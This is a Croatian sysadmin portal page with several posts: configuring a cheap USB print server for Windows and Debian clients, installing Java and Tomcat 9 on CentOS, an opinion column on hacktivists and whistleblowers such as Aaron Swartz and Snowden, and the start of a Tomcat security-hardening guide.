Install -> I have reviewed and accept..-> Network ?-> My printer is  already connected to my network(Search) -> Printers Not Found -> Set IP Address (upisujemo naš IP) -> Printers Not Found -> Installation without connection -> Potvrdimo sve do kraja.

Instalirali smo printer Samsung M2625 bez komunikacijskog porta. Print to file.

Pojavila se opcija Network koja nije na kraju uspostavila komunikaciju? Isti driver koristi multifunkcijski uređaj Samsung Laser Printer Xpress M2825 series za koji opcija postoji jer ima ugrađeni mrežni adapter. Preostaje nam da probamo "prevariti" konfiguraciju i ručno dodjeliti IP port.

Add port ... -> Standard TCP/IP Port -> Port Name (unesemo ručno IP print servera) -> Standard (Generic Network Card) ->

Napokon.

Malo nas je "smrznula" poruka:

Samsung Printer Status. Printer status is not available. Please check power and cable connection. Samsung M262x 282x Series. 192.168.1.174

Ipak, printanje testne stranice prolazi. Naš USB printer radi na 9100/tcp portu usprkos svim teškoćama. ISVU print aplikacija je doslovno dobila parametre oblika koji rade. Ipak se vrijedilo pozabaviti tim jeftinim print server rješenjem. Sistemcu kao administratoru LDAP imenika se učini da bi umrežavanje printera iz referade bilo zgodno iskoristiti za ispis "Obavijesti za korisnike" kod dodjele ili promjene zaporke AAI identiteta. Sistemac ima Linux Desktopželi printati iz LDAP web sučelja na Referadu. Samsung se potrudio i napravio Printing & Scan Driver ver V1.00.36_00.91, Unified Linux Driver. Na klijentski Debian Stretch Desktop pokrenemo install-printer.sh bez većih problema. Kroz GUI system-config-printer 1.5.7 dodamo:

    Add -> Printer -> Network Printer -> AppSocket/HP JetDirect -> Host: 192.168.1.174 Port number: 9100 -> Choose Driver -> Provide PPD file (Iz raspakirane driver arhive nalazimo: uld/noarch/share/ppd/Samsung_M262x_282x_Series.ppd ) Potvrđujemo ponuđenu instalaciju uz opcionalnu lokaciju: Referada.

Uspjeli smo, uz "malo muke", napraviti low cost print server rješenje prilagođeno našim uvjetima. Naravno, neke stvari nisu savršeno "sjele" poput odlaska printera u "Sleep Mode" nakon čega se ne može "probuditi" preko mrežnog priključka, te traži "ručno buđenje" preko tipke na panelu. Ako imate zaostalih poslova "zbog printera na spavanju" na Windows klijentu napravite:

run -> services.msc -> Print Spooler -> Desni klik -> Restart. Svi  "poslovi na čekanju" ponovno se izvršavaju.

Iz JobLog-a možemo vidjeti korisnička printanja, npr. vidimo da korisnica iz Referade printa preko SMB protokola, dok UserISVU ili sistemac koriste RAWTCP protokol.

http://192.168.1.174/JobLog.HTM 
Print Jobs
Job                 Elapsed Time     Protocol     Port     Status     Bytes Printed

43    REFERADA    0min 0sec    SMB    U1    Completed    89098
42    REFERADA    0min 1sec    SMB    U1    Completed    629031
41    REFERADA    0min 1sec    SMB    U1    Completed    628956
40    REFERADA    0min 0sec    SMB    U1    Completed    108661
39    UserISVU    0min 0sec    RAWTCP    U1    Completed    83077
38    UserISVU    0min 1sec    RAWTCP    U1    Completed    295461
37    REFERADA    0min 0sec    SMB    U1    Completed    179940
36    REFERADA    0min 0sec    SMB    U1    Completed    66031
35    REFERADA    0min 0sec    SMB    U1    Completed    537436
34    REFERADA    0min 0sec    SMB    U1    Completed    783254
33    REFERADA    0min 1sec    SMB    U1    Completed    431427
32    debianst    0min 1sec    RAWTCP    U1    Completed    3288
31    REFERADA    0min 0sec    SMB    U1    Completed    132897
30    REFERADA    0min 0sec    SMB    U1    Completed    222780
29    REFERADA    0min 0sec    SMB    U1    Completed    65451
28    REFERADA    0min 0sec    SMB    U1    Completed    140269
27    UserISVU    0min 0sec    RAWTCP    U1    Completed    97985
26    UserISVU    0min 0sec    RAWTCP    U1    Completed    96803

Naravno, cijela ova analiza je napravljena zbog naknadne odluke da je potreban mrežni način rada printera. Najelegantnije i najstabilnije rješenje je kupnja mrežnog printera s pripadajućom softverskom podrškom i dokumentacijom. No, putem ovog pregleda se može dosta naučiti o načinu rada print servera i mrežnih pisača općenito, uz upozorenje da je ovakva low cost oprema više usmjerena na home, a ne na business korisnike. Dakle, ne koristite ovo rješenje za velik broj korisnika, jer hardverski zasigurno nije toliko robusno.

sri, 2018-12-05 13:37 - Goran Šljivić

Kategorije:

Hardware

Vote:

No votes yet

story_tag:

server

windows

Apache Tomcat logo "Kako pravilno instalirati Tomcat?!? Pfff, samo zaguglaš i biraš između prvih dvadesetak naputaka, problema nema jer Tomcat je vrlo popularan web serverčić za Java aplikacije, dugo je na terenu (i bla-bla)". Realnost je ovakva: na službenom Tomcatovom siteu ova tema je - ajmo reć' - čudno obrađena; što se tiče weba - uputa i savjeta ima puno, definitivno previše uzevši u obzir da su neki od njih zastarjeli, neki su necjeloviti, u nekima se autoru potkradu greške ili nešto improvizira... pa nakon višednevnih isprobavanja shvatimo da, doduše, možemo Tomcat postaviti na Linux server i-'vako-i-'nako ali ne i pravilno tj. tako da brzo dobijemo funkcionalan web server, ujedno dostatno zaštićen i spreman za učinkovito administriranje.

Dobro je znati:

Tomcat i Javu, najnovije verzije u vrijeme pisanja ovog članka, postavljamo na CentOS 7.5.x;
taj server treba završiti u predprodukcijskoj ili produkcijskoj okolini (instalacije za potrebe razvoja su jednostavnije, također, redovito se primjenjuje Java Development Kit a ne Java Runtime Environment).
naredbama prisutnim u nižim primjerima dodajte sudo kao prefiks ili prijeđite u kontekst roota.

I. JAVA

Zato što je nužan preduvjet za nesmetan rad Tomcata, posvetit ćemo dio ovog članka potencijalno glavobolnoj temi odabira određene verzije/izvedenice Java platforme te, dakako, pravilnog postavljanja odabrane Jave u računalo. Koje su verzije Jave preporučene za Tomcat 9.x lako ćemo naći u njegovoj dokumentaciji - Java SE verzija 8.x i više - i to je ok. Ostaje nam zapetljaniji dio priče: hoćemo li instalirati Oracleovu komercijalnu verziju Jave SE (Hotspot), Oracleovu besplatnu izvedenicu te iste verzije (OpenJDK) ili onu verziju i varijantu OpenJDK Jave koja se nalazi u službenom repozitoriju naše Linux distribucije. Razrada prethodne rečenice bez poteškoća se može pretvoriti u zaseban članak ali mi ćemo se zadovoljiti s par relevantnih smjernica:

Oracleova komercijalna Java redovito prednjači u optimiziranosti i novim značajkama, donoseći kupcu i službenu podršku korporacije;
Oracelovu besplatnu Javu ne krase odlike komercijalne ali je stabilna i spremna za samoinicijativne prilagodbe nekoj specifičnoj potrebi;
Oracleova besplatna Java učlanjena u repozitorij SW paketa određene Linux distribucije u nekim je aspektima prilagođena baš tom OS-u; isplati ju se rabiti ukoliko je riječ o dobro podržanom i perspektivnom OS-u;
ponekad nemamo slobodu odabira verzije i izdanja Jave, naime, ako se autor neke aplikacije kategorički izjasni da je preduvjet za nesmetan rad njegovog uratka ta-i-ta verzija Jave, onda nije mudro nametati svoj odabir.

Slijedi instaliranje Jave. Ukoliko favoriziramo OpenJDK iz repozitorija CentOS-a, yumće tu najnoviju instalaciju postaviti kao aktivnu. Pozor! Ovakav način instaliranja OpenJDK može zbuniti jer akronim JDK sugerira da u sustav postavljamo Java Development Kit (JDK) dok u stvarnosti yum preferira - upražnjavamo li napredne tehnike uporabe tipkovnice, što je najčešći slučaj - Java Runtime Environment (JRE). U pravilu mi i želimo JRE, ali postaje nezgodno ako je neophodna baš JDK jer ćemo u tom slučaju, s instaliranom JRE, dobijati svakojake greške. Da ne duljimo, upišite yum install java-1.8 (trenutno najnovija verzija CentOS Jave), triput pritisnite tipku TAB i vidjet ćete da se defaultno nudi instalacija JRE te da OpenJDK dolazi u ovećem broju modula kako bismo mogli instalirati samo potrebne.

Sad ćemo u CentOS "natočiti" najnoviju komercijalnu verziju Jave SE s Oracleovog sitea. Provjeravamo postoje li i koje su Jave u sustavu; izvještaj pokazuje da već imamo OpenJDK JRE.

alternatives --config java

There is 1 program that provides 'java'.

Selection Command

-----------------------------------------------

*+ 1 java-1.8.0-openjdk.x86_64 (/usr/lib/jvm/

java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64/jre/bin/java)

Skinemo s Oracleovog web mjesta .rpm paket - najnovija Oracleova verzija Jave je 11 - i naredbom oblika yum localistall <paket> instaliramo je u sustav; sad će naredba alternatives --config java prikazati niže podatke. Znakovi + i * su preraspoređeni ali ne moramo se zamarati smislom te poruke, samo ukucamo u prompt broj 2 i potvrdimo.

alternatives --config java

There are 2 programs which provide 'java'.

Selection Command

-----------------------------------------------

+ 1 java-1.8.0-openjdk.x86_64 (/usr/lib/jvm/

java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64/jre/bin/java)

* 2 /usr/java/jdk-11.0.1/bin/java

Enter to keep the current selection[+], or type selection number: 2

Nakon ove operacije Oracle Java je defaultna i prioritetna, uvjerimo se s alternatives --config java ili nižom naredbom.

java -version

java version "11.0.1" 2018-10-16 LTS

Java(TM) SE Runtime Environment 18.9 (build 11.0.1+13-LTS)

Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.1+13-LTS, mixed mode)

Zgodan trik: praktičan način aktiviranja potrebne Jave je deinstalacija svih drugih (na produkcijskom serveru to ionako moramo učiniti) jer tada se OS nema oko čega dvoumiti.

I Tomcat i CentOS su open-source pa ćemo nadalje u primjerima rabiti OpenJDK.

II. TOMCAT

I ovdje, kao maloprije s Javom, trebamo odlučiti: hoćemo li instalirati originalni Tomcat kojega stvara i nudi Apache Software Foundation ili onaj već učlanjen u neku Linux distribuciju. "Posvojeni" Tomcat je, kažu upućeni, bolje integriran s OS-om domaćinom, lakše se instalira... ali redovito u razvoju značajno zaostaje za ASF-ovim Tomcatom. Mi se opredjeljujemo za izvorni i (trenutno) najnoviji ASF-ov Tomcat 9.0.13.

1. Uvažavajući FHS smjernice, Tomcat ćemo na datotečni sustav CentOS-a smjestiti u direktorij /opt, poddirektorij tomcat9.

2. Kreiramo servisni račun tomsvc. Primjećujete da osobni direktorij tog sistemskog korisnika odgovara Tomcatovom, razlog je taj što servisni račun shvaćamo integralnim dijelom konkretne Tomcat instalacije. Također, smatramo da je najbolji pristup onemogućiti tom računu ulogiravanje u sustav. Ako nakon izvršene naredbe u datoteci shadow vidimo da redak tomsvc ima dva uzastopna uskličnika umjesto enkriptirane lozinke, naš servisni račun je neprobojan.

useradd -m -U -d /opt/tomcat9 -s /bin/false tomsvc

3. Na disku imamo Tomcat 9.0.13, skinut s https://tomcat.apache.org u formatu tar.gz te raspakiran u /install direktorij; sad ćemo u direktorij /opt/tomcat9 premjestiti sve što je unutar distribucijskog direktorija, ne i sam taj direktorij.

mv /install/apache-tomcat-9.0.13/* /opt/tomcat9

4. Servisnom računu i njegovoj grupi predajemo vlasništvo nad cijelim tomcat9 ogrankom direktorija i datoteka. Ne primjenjujemo mogućnost kreiranja korisnika bez primarne grupe - kako neki sugeriraju - jer bismo time prekršili standard a ne znamo (niti možemo znati) koje bi to neželjene nuspojave izazvalo.

chown -R tomsvc:tomsvc /opt/tomcat9

5. Prihvaćamo se pretvaranja Tomcata u boot-time servis, znači, kreirat ćemo datoteku instrukcija tomcat9.service u /etc/systemd/system. Kako to biva sa softverom, Tomcat i Java, pa i sam Systemd Manager, prepuni su tzv. defaultnih (inicijalnih, podrazumijevanih) vrijednosti, utoliko u tomcat9.service navodimo samo one stavke kojima mijenjamo podrazumijevanu vrijednost. Slijedi jedna datoteka instrukcija opće namjene s pojašnjenjima, nadamo se da će poslužiti kao dobra osnovica za daljnje prilagodbe nekoj konkretnoj implementaciji.

[Unit]

Description=ApacheTomcat9

Wants=network.target

After=network.target

[Service]

Type=forking

Environment="JAVA_HOME=/usr/lib/jvm/jre"

# Koristimo li apsolutnu putanju poput /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.191.b12-0.el7_5.x86_64/jre,

# morat ćemo rekonfigurirati sve pokazivače u svim skriptama na izvršni Java modul nakon

# svakog značajnijeg ažuriranja Jave.

Environment="CATALINA_PID=/opt/tomcat9/temp/tomcat.pid"

Environment="CATALINA_HOME=/opt/tomcat9"

Environment="CATALINA_OPTS=-Xms2048M -Xmx2048M -server -XX:+UseG1GC"

# U varijablu CATALINA_OPTS stavljamo one parametre koji trebaju zahvatiti samo Tomcat,

# ne i druge Java aplikacije na serveru. Poštujući Oracleovu preporuku, koristimo istu

# vrijednost za inicijalnu i maksimalnu količinu RAM-a. Parametar -server je defaultan za

# 64-bitnu JVM, ovdje je zbog potrebe testiranja parametra -XX:+UseG1GC.

Environment="JAVA_OPTS=-Djava.awt.headless=true -Djava.security.egd=file:///dev.urandom -Djava.net.preferIPv4Stack=true"

# Parametri varijable JAVA_OPTS su strongly recommended za Tomcat, njihovo značenje i implikacije lako ćemo saznati guglanjem.

ExecStart=/opt/tomcat9/bin/startup.sh

ExecStop=/opt/tomcat9/bin/shutdown.sh

User=tomsvc

Group=tomsvc

UMask=0007

#RestartSec=10s

#Restart=on-failure

[Install]

WantedBy=multi-user.target

6. Preostaje nam par uobičajenih postupaka kojima osiguravamo punopravno članstvo Tomcata među auto-start servisima.

systemctl daemon-reload, potom systemctl start tomcat9 pa systemctl enable tomcat9

7. Ovaj korak znamo i žmirećki odradit', prisutan je samo zbog cjelovitosti naputka.

firewall-cmd --zone=public --permanent --add-port=8080/tcp

firewall-cmd --reload

8. Ekspresna provjera cjelokupnog posla:

Reboot servera;
u browser na samom serveru upisati http://localhost:8080/examples;
pokrenuti poneku demo aplikacijicu iz svake grupe primjera.

9. Radi? Naaravno da radi! Ne radi?!? ehh... krenite od logova u /opt/tomcat9/logs, sretno! :o)

Ovime završava uobičajena, rekli bismo standardna instalacija Tomcata. Sad možemo krenuti s podešavanjem njegovim za prihvat aplikacija, baviti se anti-intruder zaštitom... ali možemo i nastaviti s jednom od dvije nestandardne instalacije (u kontekstu postavljanja Tomcata na jedno-te-isto računalo). Takozvana multi-instance instalacija Tomcata nastavlja se na gore opisanu instalaciju tako da se dosta složenim zahvatima kreiraju kolekcije određenih Tomcatovih mapa i konfiguracijskih datoteka koje se nadalje nezavisno konfiguriraju, pogodno za hosting scenarije. Drugi način nestandardne instalacije Tomcata u jedno računalo je instaliranje i zasebno konfiguriranje u svemu nezavisnih Tomcata, primjerice, instaliramo Tomcat 8.5 u /opt/tomcat8 i Tomcat 9.x u /opt/tomcat9 - sada je svaka instalacija u svojoj JVM; praktično rješenje kad s jedne glavne verzije migriramo aplikacije na drugu. Na nižoj slici vidimo miroljubivu koegzistenciju Osmice i Devetke.

Nestandardne instalacije podrazumijevaju ne samo dobro poznavanje Tomcata već i specifične operativne scenarije (ta nećemo si bezrazložno komplicirati život), trenutno nam je zanimljivija problematika portova na kojima sluša naš tek postavljeni web serverčić. Naime, IT profesionalci, zamalo pa izdresirani pravilom da web server zaprima HTTP konekcije na TCP port 80 a HTTPS konekcije na 443, imaju jaku potrebu rekonfigurirati Tomcatove defaultne 8080 i 8443 portove... i potom se bez ikakve stvarne potrebe nerviraju zbog toga što se Tomcat uporno ruši! Mačak je ovdje zaista nevin, to Linux OS ne dopušta pristup niskim portovima softveru pokrenutom u kontekstu običnog korisnika. Nije na odmet znati preporuku samog Apache projekta: Tomcat je prvenstveno aplikacijski server i treba se "skrivati" iza proxy sloja (poput Apache web servera, F5 BIG-IP, Citrix Netscalera...) od kojega se ujedno očekuju TLS terminacija i load balancing. Zaključujemo da su u takvoj sistemskoj arhitekturi visoki portovi koje Tomcat rabi sasvim su u redu. No, postoji li opravdana potreba da Tomcatovi konektori zaista "sjede" na portovima ispod 1024, primijenit ćemo jedno od ovoga:

Zavrtjeti Tomcat u kontekstu root accounta = najlakše rješenje, ujedno i najteži mogući grijeh, znamo zašto;
koristiti authbind aplikaciju = stara je 4 godine, nikad se ne zna kad će biti "pregažena" nekim updateom OS-a;
kombinacijom iptables/firewalld postaviti redirekciju prometa s porta 80 na 8080. E, to već obećava! Slijedi primjer redirekcije koja preživljava restart računala:

firewall-cmd --zone=public --add-masquerade --permanent

firewall-cmd --zone=public --add-forward-port=port=80:proto=tcp:toport=8080 --permanent

Slijedi primjena TLS-a te prateće mjere zaštite podataka i Tomcata, do čitanja!

čet, 2018-12-06 14:29 - Ratko Žižek

Vijesti:

Kuharice:

Za sistemce

Kategorije:

Sistemci

Vote:

No votes yet

story_tag:

U prošlomjesečnoj kolumni pozabavili smo se hakerima, crnim, bijelim i sivim. Nismo spomenuli još jednu vrstu, jer bi ih bilo šteta spomenuti samo usput. Radi se o hakerima koji su se posvetili hakiranju društva, takozvanim haktivistima.

Počeci haktivizma sežu u davne osamdesete, kad su se mrežom širili virusi/crvi koji su prenosili angažirane poruke, kao na primjer WANK (Worms Against Nuclear Killers). Devedesete su donijele DoS napade protiv siteova koji aktivistima nisu bili po volji, izražavajući tako protest protiv nekih zakona ili političkih odluka. Sjećam se (s nostalgijom) apela da se na Echelon defiance day u signature, poruku koja se priključi na kraj svakog poslanog maila, stavi tekst "Kill the president". Nije se, naravno, radilo o pozivu na stvarno nasilje, namjera je bila da se zaguše računala projekta Echelon koja nadziru telefonski i Internetski promet u potrazi za uzorcima koji su sumnjivi.

U siječnju 2019. bit će godinjica smrti hakera Aarona Swartza. Sudjelovao je u razvoju dvaju formata za razmjenu sadržaja, RSS i Markdown, te u stvaranju organizacije Creative Commons, da spomenemo samo neke njegove doprinose. Držeći se uvjerenja da pristup znanstvenim informacijama ne treba naplaćivati, već trebaju biti slobodne i dostupne svima, 2011. na MIT-u je presnimavao članke znanstvenih časopisa, s namjerom da ih objavi na netu. Iako je računalo na koje je skidao podatke sakrio u ormar, nije se zapravo ni potrudio prikriti svoj identitet, prijavio se korisničkim računom koji mu je sveučilište dodijelilo. Uhitila ga je sveučilišna policija, a onda su ga preuzeli federalni tužitelji koji su htjeli od njega napraviti primjer. Sastavili su opsežnu tužbu i zatražili drastičnu kaznu: 35 godina zatvora, milion dolara odštete i zapljenu imovine. Nakon toga mu je ponuđena nagodba, ako prizna i pospe se pepelom odslužit će samo 6 mjeseci. Aaron je odbio nagodbu, uzvratio protuprijedlogom koji je glatko odbijen. Nakon toga se objesio u svom stanu. Očigledno je da se nije smatrao krivim i nije želio provesti ni dana u zatvoru. MIT je izrazio žaljenje zbog tragičnog ishoda, izjavivši da tako stroga optužba nije bila njihova želja. Drugim riječima, za sve su krive federalne vlasti, koje su borca za slobodu informacija tretirale kao nekakvog međunarodnog terorista. Zbog zasluga u razvoju Interneta Aaron Swartz je 2013. posthumno uvršten u Internet Hall of fame.

Aaron je primjer sveučilišnog hakera koji je doprinio razvoju Internetskih tehnologija, ali je njegov interes prerastao tehnologiju i prenio se na društveni angažman. Tehnologija mijenja društvo, ali nije svejedno hoće li se koristiti za dobrobit svih, ili samo povlaštenih. Njegova priča krije znakovitu ironiju: pretplata na znanstvene publikacije sve je skuplja, što dobro znaju naši akademici kojima država u doba krize uskraćuje financiranje. Kako se baviti znanošću ako ne pratiš njezin razvoj? Ironično je što svu zaradu od publikacija uzimaju izdavači, autori su zadovoljni već time što im je rad objavljen. Kapital tako zarađuje već na objavljivanju rezultata znanstvenih istraživanja, ne samo na njihovoj praktičnoj primjeni. Aaron je htio nešto poduzeti protiv tog apsurda pa se našao na meti državne birokracije i stradao.

S obzirom na svoju filozofsku edukaciju, ne mogu odoliti da se ne prisjetim sudbine grčkog filozofa Sokrata. Živio je skromno, razgovarajući svakodnevno na Atenskom trgu s ljudima o njihovim uvjerenjima. Postavljao bi im sugestivna pitanja, tako da bi nakon nekoliko minuta tvrdili nešto suprotno od onog s čime su započeli razgovor. Sokrat se nije smatrao boljim ni pametnijim od drugih ljudi, njegova je prednost u tome što on zna da ništa ne zna, dok drugi ne znaju da ne znaju. Uvrijedio je mnoge, pa su ga trojica sugrađana tužili da ne vjeruje u bogove i kvari omladinu. Nisu shvatili njegovu tvrdnju da ga progoni njegov daimon, unutarnji glas razuma i savjesti, pa su ga optužili da vjeruje u demone. Tražili su smrtnu kaznu. Na suđenju je Sokrat odbacio optužbe, poručivši porotnicima da ne mogu naškoditi njegovoj besmrtnoj duši, ali mogu naškoditi svojoj ako ga nepravedno osude. I još je drsko umjesto kazne zatražio rentu, jer je zaslužuje obavljajući javnu funkciju borbe protiv neznanja. Osuđen je na smrt s 52% posto glasova (baš kao Brexit!). Građani Atene su se sutradan pokajali, bio je pripremljen njegov bijeg iz zatvora. Trebao se pritajiti na neko vrijeme, pa se vratiti u Atenu kad budu bolja vremena. Sokrat je to odbio. Uvijek je poštovao atenske zakone, zašto bi ih kršio kad su se okrenuli protiv njega. Sam je popio otrov i oprostio se od prijatelja. Platonu se tada zamjerila demokracija, smatrao je da je to vladavina nepismenih. Uvijek će pet idiota preglasati jednog pametnog.

Je li i Aaron na sličan način poput Sokrata predložio tužiteljima da ga umjesto kazne nagrade jer se zalaže za opće dobro? Pa je nakon toga sam sebi oduzeo život, jer bi zatvor za jednog hakera bio gora kazna od smrti?

Neki od poznatih aktivista radili su kao sivi hakeri, informatičari u državnoj službi. Smučilo im se od stvari koje su na poslu vidjeli, masovno prisluškivanje, aroganciju i zakulisne igre moćnika. Odlučili su progovoriti, postati zviždači. Cijena koju plaćaju je velika, ostali su bez posla, progonjeni su, proglašavani izdajnicima i stranim špijunima. Na Youtubeu možete pronaći dokumentarac o njima, upišite Digitalni disidenti.

Daniel Ellsberg je za vrijeme Vijetnamskog rata radio u Američkoj ambasadi u Vijetnamu. Nakon susreta s ljudima koji su odbijali mobilizaciju i za to odležali u zatvoru, objavio je dokumente koji dokazuju da je predsjednik sistematski obmanjivao javnost. Osuđen je na 115 godina zatvora, ali je suđenje prekinuto kad je otkriveno da je Nixon dao nezakonito prisluškivati Ellsberga. Danas živi od predavanja i kaže da "radije podnosi rizike demokracije, nego rizike diktature".

Annie Machon, Britanka koja se odmetnula iz MI5 kaže da bi iPhone trebalo zvati SpyPhone. Facebook i Google su sjajni za obavještajce, informacije koje su se nekada prikupljale mjesecima mukotrpnim terenskim radom sada su dostupne u trenu.

Thomas Drake osamdesetih je radio kao obavještajni analitičar zrakoplovstva SAD (u to vrijeme su špijunski avioni letjeli iznad SSSR-a), zatim su ga zaposlili CIA, pa NSA. Tu je postao svjestan razmjera masovnog špijuniranja građana bez sudskog naloga, čime se krši Ustav SAD. Njegov kolega William Biney napravio je program koji filtrira masu informacija i izdvaja obavještajno zanimljive podatke, tako da poznaje tehnologiju i dobro zna o čemu govori. Biney je, da sačuva svoj integritet, napustio NSA i odlučio se suprotstaviti vladi SAD, smatrajući da se NSA bavi kriminalnom aktivnošću i da je Vlada izdala vlastiti narod. Pokušao se boriti pravnim metodama, bez uspjeha. Drake je ostao u NSA i pokušao se izboriti za promjene iznutra, također uzalud. NSA nadzire i novinare, što je ponukalo Drakea da se sastane s jednim od njih i ispriča mu što se radi. To je rezultiralo objavom serije članaka, koji su na kraju odbačeni kao nagađanja jer nisu bili potkrijepljeni dokumentima. Taj je dio posla kasnije odradio Edward Snowden, dokumenti koje je objavio nedvojbeno dokazuju da je masovno prisluškivanje prijetnja demokraciji u cijelom svijetu. "Biti domoljub ne znači slijepo slušati vlast, naprotiv, zanemarivanje obaveza prema narodu i domovini, u korist vlade, jest suprotnost patriotizmu.", kaže Snowden u filmu.

Julian Asange smatra da je sramota što je samo 1% dokumenata koje je otkrio Snowden objavljeno. "Ti dokumenti nisu vlasništvo jedne agencije ili vlade, oni pripadaju povijesti i dokumenti su nečega kroz što je čovječanstvo prolazilo". "Sva su ljudska bića na planeti koja koriste Internet žrtve NSA i zaslužuju da se zna što im se događa". Assange, haker i programer, osnivač WikiLeaksa, za razliku od ostalih nije insider, već je hakiranjem izvana dolazio do informacija. On je pobornik potpune transparentnosti, vjeruje da će jedino tako vlade i korporacije prestati kršiti zakone i moralne norme. Dok se ostali zviždači još pozivaju na patriotizam višeg reda, vjeruju da će istina doprinjeti da njihova domovina demokratski ojača, Assange zastupa prava cijelog čovječanstva.

Početkom devedesetih, dok se kod nas ratovalo za nacionalne države, u kafiću sam pijuckao kavu s prijateljem hakerom. Tada mi je rekao: "Većina se ljudi brine o sebi, svojoj obitelji, svom selu, eventualno o svojoj naciji. Tko brine o cijelom čovječanstvu? A o planeti Zemlji? Ili o cijelom svemiru?" Ta me pitanja od tada prate cijelog života, neprestano pokušavam sebi odgovoriti na njih.

Dok sam pisao članak, poželio sam prebaciti neke datoteke s mobitela na računalo. Sprava je "Made in China", znate već, povoljna cijena. Kad sam pokrenuo aplikaciju za prijenos podataka, od mene se tražilo da joj dam dozvole koje omogućavaju narušavanje moje privatnosti. "Pristajete li na to da proizvođač bilježi vaše aktivnosti itd. its." Ne, ne pristajem. Aplikacija se nakon toga zatvara i ne mogu je koristiti dok se ne pokorim i pristanem da me špijuniraju. Pokušao sam je deinstalirati, ne ide. Ispada da kupujući pametni telefon biramo tko će nas špijunirati, Amerikanci ili Kinezi? Koje su vaše preferencije?

Kineska država pomoću tehnologije prati građane i za sve aktivnosti im dodjeljuje društvene bodove. Ako skupite dovoljno minusa, ne možete se zaposliti, javno nastupati, ne možete kupiti kartu za autobus. Ako pristanemo na to, na kraju više neće biti potrebna cenzura ni represija, zavladat će autocenzura i opće licemjerje. S druge strane, zviždači poručuju Amerikancima da im najveća prijetnja nisu Kinezi, već njihova vlastita država koja im formalno daje neka prava, pa ih samo tako krši. Što je činiti nama ostalima? Zanosimo li se mišlju da je situacija ipak bolja u EU, jer nas štite bolji zakoni? Ili je stvar gotova, igra unaprijed izgubljena? Treba li se odreći ljudskih prava radi udobnosti? Ne hvala, ovo je samo faza razvoja čovječanstva, ne treba se predati, igra još nije izgubljena. Haktivisti koje smo spomenuli daju nam primjer. Koliko god bili izuzetne pojave, jer njihove manje hrabre kolege još uvijek rade u agencijama podvijena repa i protiv svoje savjesti, postoji nada da će se s vremenom skupiti kritična masa ljudi koji će reći dosta! U protivnom, možda će Homo sapiens postati zastarjela vrsta koju treba prevladati (Čitajte Hararijevu knjigu Sapiens).

Možemo li haktiviste smatrati etičkim hakerima, s obzirom na to da krše zakon i objavljuju povjerljive dokumente? Ili trebamo biti zabrinuti zbog činjenice da ih zbog toga progone i sude im, dok državne agencije i velike korporacije nekažnjeno krše Ustav, ljudska prava i zakone? Odgovor je zapravo jednostavan: etika je iznad zakona, ako se zasniva na savjesti i samosvjesti. Haktivisti nisi protiv naroda, nego protiv zloupotreba demokracije i neograničene moći bez nadzora. Oni upozoravaju na to da obavještajci bezočno lažu članovima kongresnih komisija, taje podatke od predsjednika SAD, od javnosti. Od njih saznajemo da NSA u prostorijama telekoma drži svoju opremu za nadzor prometa, kojom nas sve špijunira, bili lojalni ili nelojalni. U Njemačkoj je izbio skandal kad su mediji objavili da NSA prisluškuje mobitel Angele Merkel. Ali ubrzo se sve stišalo, kao da je prihvaćeno kao normalno da se nadzire sve, i neprijatelje i saveznike. Kakvu moć nad nama imaju organizacije koje znaju sve o svakome i koje mogu djelovati bez nadzora? Da ne postoji takva praksa, ne bi ni bilo hakera zviždača koji na nju upozoravaju. Od Sokrata pa do današnjih haktivista, suočavamo se sa slabostima demokracije i nastojimo izgraditi bolje, pravednije društvo. A to nije nimalo lak put.

čet, 2018-12-13 21:37 - Aco Dmitrović

Kategorije:

Vote:

No votes yet

story_tag:

hakeri

haktivisti

Apache Tomcat logo Instalirali smo Javu i Tomcat na CentOS, odradili osnovne provjere funkcionalnosti (vidi: https://sysportal.carnet.hr/node/1834)... sve je ok. Vrijeme je da razmislimo kako ćemo zaštititi našeg Mačka od napada s mreže.

Tomcat uživa status softverskog uratka s vrlo malo evidentiranih ranjivosti, još tijekom instalacije primijenili smo neke bazične mjere zaštite (npr., primjena tar.gz paketa i servisnog računa) pa sada, ako smo mu namijenili neki posao u lokalnoj mreži, možemo odmah prijeći na prihvat aplikacija. S druge strane, opslužuje li naš web server klijente koji dolaze s nesigurnih mreža, bilo direktno ili indirektno (kroz reverzni proxy), imamo dodatnog posla, posebice ako su podaci koji cirkuliraju na relaciji klijent <-> Tomcat klasificirani nekim internim ili zakonskim normama.

Sigurnosno zbrinjavanje Tomcata svakako trebamo započeti primjenom smjernica izloženih na adresi http://tomcat.apache.org/tomcat-9.0-doc/security-howto.html, većina ih je razumljiva i lako provediva. Mi ćemo se fokusirati na varljivo jasne savjete i primjere, naime, tijekom njihove implementacije pojave se razne dileme ili stvar jednostavno ne radi. Guglanje pomaže, svakako, ali samo ako smo voljni studirati prikazanu građu - pažljivo čitati, uspoređivati i isprobavati savjete jer ima ih svakojakih. Kakogod, vaš autor se prihvatio tog posla, slijedi provjereno štivo na temu zaštite Tomcata 9.x.

1. Zbrku kontradiktornih savjeta glede možebitnih napada kroz port TCP 8005 na kojem Tomcat očekuje naredbu za prestanak rada, i kako tome doskočiti, rasplest ćemo nižim smjernicama:

nije potrebno mijenjati defaultni port - on prihvaća konekcije samo s loopback adaptera, iznutra; također, redovito je zatvoren vanjskom svijetu lokalnim ili mrežnim vatrozidom;
potrebno je promijeniti izraz SHUTDOWN u nešto osobito jer taj izraz je u stvari lozinka a bez nje niti jedan user-mode proces ne može isključiti Tomcat kroz port 8005;
u specifičnim situacijama, recimo da Tomcat opslužuje klijente s ovećim pravima neophodnim za razvoj aplikacija, možemo i onemogućiti taj port u conf/server.xml: <Server port="-1" shutdown="L0z1nka">. Sada Tomcat može spustiti samo superuser naredbom kill, uočite, to je još uvijek regularni način stopiranja procesa.

2. Security Lifecycle Listener, u conf/server.xml predstavljen elementom <Listener className="org.apache.catalina.security.SecurityListener"/>, onemogućen je kako ne bi ometao inicijalno postavljanje Tomcata. Naime, on sprječava podizanje web servera ukoliko nisu zadovoljeni određeni sigurnosni preduvjeti jer tada, po mišljenju ASF-a, njihov produkt postaje isuviše nezaštićen. Nažalost, niti nakon višednevnog rovarenja po Webu nisam pronašao pregled svih provjera koje odrađuje, no to nije razlog da ga ignoriramo. Znači, kad obavimo osnovnu konfiguraciju Tomcata, uključit ćemo ga, restart, pa ako se Tomcat ne digne zavirit ćemo u conf/catalina.out da vidimo što nam zamjera.

